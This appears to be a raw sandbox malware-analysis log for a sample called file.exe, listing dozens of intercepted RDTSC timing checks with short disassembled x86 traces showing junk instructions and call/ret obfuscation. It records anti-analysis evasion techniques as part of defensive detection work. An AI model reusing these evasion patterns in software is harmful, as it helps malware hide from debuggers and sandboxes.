                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC639 second address: 12CC68E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4899Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D1AC1h], ecx 0x00000010 push 00000000h 0x00000012 clc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F5CB8E48998h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f xor bl, FFFFFFE6h 0x00000032 push eax 0x00000033 pushad 0x00000034 jne 00007F5CB8E4899Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c ja 00007F5CB8E48996h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC7ED second address: 12CC80F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5CB8E4DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F5CB8E4DD9Ch 0x00000010 popad 0x00000011 push eax 0x00000012 jg 00007F5CB8E4DDA8h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD7CF second address: 12CD7E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E489A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC80F second address: 12CC813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD7E7 second address: 12CD7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC813 second address: 12CC817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF81D second address: 12CF823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D05C4 second address: 12D05D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5CB8E4DD9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CF823 second address: 12CF827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D05D7 second address: 12D0672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F5CB8E4DDA1h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F5CB8E4DD98h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jmp 00007F5CB8E4DDA3h 0x0000002d mov ebx, dword ptr [ebp+122D2A7Ch] 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D381Dh] 0x0000003b jmp 00007F5CB8E4DDA2h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007F5CB8E4DD98h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Bh 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c push eax 0x0000005d pushad 0x0000005e push esi 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0672 second address: 12D067F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007F5CB8E4899Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D15A1 second address: 12D15A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D172E second address: 12D1733 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1733 second address: 12D17A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jg 00007F5CB8E4DDA2h 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+1244D97Bh] 0x00000015 sub edi, dword ptr [ebp+122D3A79h] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 mov edi, esi 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b mov ebx, dword ptr [ebp+122D3A9Dh] 0x00000031 mov eax, dword ptr [ebp+122D0225h] 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F5CB8E4DD98h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 mov di, 72A1h 0x00000055 push FFFFFFFFh 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b jnl 00007F5CB8E4DD96h 0x00000061 pop eax 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D17A3 second address: 12D17C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5CB8E489A4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D3550 second address: 12D355B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D355B second address: 12D355F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D355F second address: 12D3563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5B99 second address: 12D5B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5B9D second address: 12D5BA7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5CB8E4DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D6AE2 second address: 12D6AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D6AE6 second address: 12D6AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D5E20 second address: 12D5E24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D7C39 second address: 12D7C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D7CDC second address: 12D7CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E489A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D7CF7 second address: 12D7CFC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9CC2 second address: 12D9CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9CC6 second address: 12D9CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D7E2C second address: 12D7E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F5CB8E4899Ch 0x0000000b jnc 00007F5CB8E48996h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9CCA second address: 12D9CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5CB8E4DD96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D7E45 second address: 12D7E5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E489A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9CD6 second address: 12D9CDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D9CDB second address: 12D9CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB45F second address: 12DB464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA5C0 second address: 12DA5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F5CB8E48996h 0x00000009 jnl 00007F5CB8E48996h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA5D9 second address: 12DA5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB464 second address: 12DB4E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jne 00007F5CB8E48996h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F5CB8E48998h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D390Dh] 0x00000031 mov edi, dword ptr [ebp+122D3865h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F5CB8E48998h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 mov edi, dword ptr [ebp+122D3A21h] 0x00000059 push 00000000h 0x0000005b sbb bh, 00000073h 0x0000005e xchg eax, esi 0x0000005f jng 00007F5CB8E489A0h 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DA5E2 second address: 12DA5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DB4E1 second address: 12DB4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC752 second address: 12DC756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DC756 second address: 12DC75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7FB0 second address: 12E7FDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DD9Fh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F5CB8E4DDA7h 0x00000011 jmp 00007F5CB8E4DDA1h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7FDC second address: 12E7FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7FE2 second address: 12E7FE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EE72 second address: 127EE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E489A8h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127EE91 second address: 127EE97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E780F second address: 12E7815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7955 second address: 12E7959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E7959 second address: 12E7973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F5CB8E489A1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ECF39 second address: 12ECF3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ECF3D second address: 12ECF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ED159 second address: 12ED177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jl 00007F5CB8E4DDA0h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12ED177 second address: 12ED1A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F5CB8E489A4h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5CB8E4899Bh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F2BD1 second address: 12F2BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F32F2 second address: 12F3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4899Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3306 second address: 12F3341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F5CB8E4DD96h 0x0000000c jmp 00007F5CB8E4DD9Fh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F5CB8E4DDA9h 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3482 second address: 12F348A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F348A second address: 12F34AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5CB8E4DD96h 0x0000000a popad 0x0000000b pop esi 0x0000000c push ecx 0x0000000d js 00007F5CB8E4DD9Eh 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007F5CB8E4DD96h 0x0000001b js 00007F5CB8E4DD9Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F35F4 second address: 12F35F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F35F8 second address: 12F360F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DD9Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F360F second address: 12F3615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3615 second address: 12F3619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F3619 second address: 12F365D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5CB8E489A5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5CB8E489A5h 0x00000013 push edx 0x00000014 jmp 00007F5CB8E4899Fh 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12F365D second address: 12F3694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5CB8E4DD9Dh 0x00000008 pushad 0x00000009 popad 0x0000000a jbe 00007F5CB8E4DD96h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5CB8E4DD9Eh 0x0000001a jmp 00007F5CB8E4DD9Ch 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12808BC second address: 12808E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F5CB8E48996h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F5CB8E489A7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12808E0 second address: 1280915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5CB8E4DDA0h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5CB8E4DDA2h 0x00000013 jmp 00007F5CB8E4DD9Ah 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB553 second address: 12FB557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C81F8 second address: 12A6CD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5CB8E4DDA8h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c lea eax, dword ptr [ebp+12489F39h] 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F5CB8E4DD98h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov cl, E8h 0x0000002e jmp 00007F5CB8E4DDA9h 0x00000033 mov ecx, dword ptr [ebp+122D39D5h] 0x00000039 nop 0x0000003a pushad 0x0000003b pushad 0x0000003c jmp 00007F5CB8E4DDA6h 0x00000041 jmp 00007F5CB8E4DDA9h 0x00000046 popad 0x00000047 push edi 0x00000048 pushad 0x00000049 popad 0x0000004a pop edi 0x0000004b popad 0x0000004c push eax 0x0000004d jmp 00007F5CB8E4DDA4h 0x00000052 nop 0x00000053 mov dx, 304Bh 0x00000057 push edx 0x00000058 mov edx, dword ptr [ebp+1247B3FCh] 0x0000005e pop ecx 0x0000005f call dword ptr [ebp+122D19F4h] 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F5CB8E4DD9Eh 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C87A9 second address: 12C8820 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5CB8E4899Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 03BAF798h 0x00000011 mov ecx, eax 0x00000013 call 00007F5CB8E48999h 0x00000018 jnc 00007F5CB8E489A0h 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jl 00007F5CB8E48996h 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007F5CB8E4899Eh 0x0000002e mov eax, dword ptr [esp+04h] 0x00000032 push eax 0x00000033 jmp 00007F5CB8E489A8h 0x00000038 pop eax 0x00000039 mov eax, dword ptr [eax] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F5CB8E489A4h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8820 second address: 12C8826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C88D5 second address: 12C88DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8958 second address: 12C8973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5CB8E4DDA4h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8CA5 second address: 12C8CAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5CB8E48996h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8FAB second address: 12C900B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F5CB8E4DD98h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D2693h], edi 0x0000002a push 0000001Eh 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F5CB8E4DD98h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c pop esi 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C900B second address: 12C9011 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9011 second address: 12C9017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9017 second address: 12C901B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C901B second address: 12C901F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C9126 second address: 12C912C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
